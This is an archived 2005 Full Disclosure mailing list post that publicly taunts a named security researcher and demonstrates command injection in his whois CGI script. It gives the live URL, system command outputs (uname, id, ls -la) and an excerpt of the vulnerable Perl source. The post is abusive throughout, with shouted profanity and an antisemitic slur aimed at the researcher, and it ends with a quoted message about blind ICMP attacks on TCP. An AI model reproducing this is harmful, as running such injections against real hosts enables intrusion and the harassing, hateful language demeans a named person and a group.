Full Disclosure mailing list archives
Fernando Gont remote command execution and big mouth vulnerability
From: Joxean Koret <joxeankoret () gmail com>
Date: Wed, 3 Aug 2005 14:22:36 +0200
SHUT THE FUCK UP!!! AND FIX YOUR F%$CK1NG WEBSITE!!! WE ARE ALL SICK OF YOUR BORING E-MAILS!!!! MO/A%SDRF!CKER! http://thor.prohosting.com/fgont/cgi-bin/whois.pl whois for domain: uname -a FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3 #0: Fri Nov 5 10:49:09 MST 2004 jblack () thor prohosting com:/usr/obj/usr/src/sys/LOCAL i386 and whois for domain: id uid=59286(u0638237) gid=1000(user) groups=1000(user) and for ls -la whois ls -la total 124 dr-xr-xr-x 2 u0638237 2000 512 Dec 28 2003 . drwxr-xr-x 6 u0638237 2000 512 Jul 21 04:35 .. -rwxr-xr-x 1 u0638237 2000 15091 Jul 30 2003 cgi-lib.pl -rwxr-xr-x 1 u0638237 2000 621 Jun 24 2003 cli.pl -rwxr-xr-x 1 u0638237 2000 993 Jul 30 2003 dig.pl -rwxr-xr-x 1 u0638237 2000 4388 Dec 28 2003 fuente.cgi -r--r--r-- 1 u0638237 2000 552 Jun 25 2003 p1.txt -r--r--r-- 1 u0638237 2000 549 Jul 7 2003 p1dig.txt -r--r--r-- 1 u0638237 2000 556 Jul 7 2003 p1host.txt -r--r--r-- 1 u0638237 2000 577 Jul 7 2003 p1ns.txt -r-xr-xr-x 1 u0638237 2000 562 Dec 28 2003 p1whois.txt -r--r--r-- 1 u0638237 2000 192 Jun 25 2003 p2.txt -r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2dig.txt -r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2host.txt -r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2ns.txt -rwxrwxrwx 1 u0638237 2000 192 Dec 27 2003 p2whois.txt -rwxr-xr-x 1 u0638237 2000 10171 Dec 28 2003 whois.cgi -rwxr-xr-x 1 u0638237 2000 842 Dec 28 2003 whois.pl BREAKING NEWS... for registrants of domain cat whois.pl whois cat whois.pl #!/usr/local/bin/perl require('cgi-lib.pl'); &ReadParse; $p1="p1whois.txt"; $p2="p2whois.txt"; print "Content-type: text/html\r\n\r\n"; $string = $in{'direccion'}; $_ = $string; $string=~ s/\>//g; ..... $cmd ----->> YOU FUCKING JEW!!!!!!!!!!! "; open(p2); while($linea=){ print "$linea"; } close(p2); Turkey hunters, inc "knock, knock, Neo follow the white turkey!!" "Fernando Gont" <fernando () frh utn edu ar>
Folks, My posts to this list have tried to show how easy it is to perform ICMP attacks against TCP. The attacks are blind, so the attacker does not need to be a "man in the middle" to perform then. The typical number of packets required to perform any of these attacks is about 16000 (in many cases, the attacker requires fewer packets). This means that even when a 128kbps link, it will take the attacker much less than a minute to perform them.
.....
Fernando Gont e-mail: fernando () gont com ar || fgont () acm org
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 03)
- Re: Fernando Gont remote command execution and big mouth vulnerability Fernando Gont (Aug 04)
- Re: Fernando Gont remote command execution and big mouth vulnerability Roman Medina-Heigl Hernandez (Aug 04)
- Re: Fernando Gont remote command execution and big mouth vulnerability Fernando Gont (Aug 04)
- Message not available
- Re: Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 04)
- Re: Fernando Gont remote command execution and big mouth vulnerability Roman Medina-Heigl Hernandez (Aug 04)
- Message not available
- Re: Fernando Gont remote command execution and big mouth vulnerability Hugo Vazquez Carapez (Aug 05)
- Re: Fernando Gont remote command execution and big mouth vulnerability Fernando Gont (Aug 04)
- <Possible follow-ups>
- Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 03)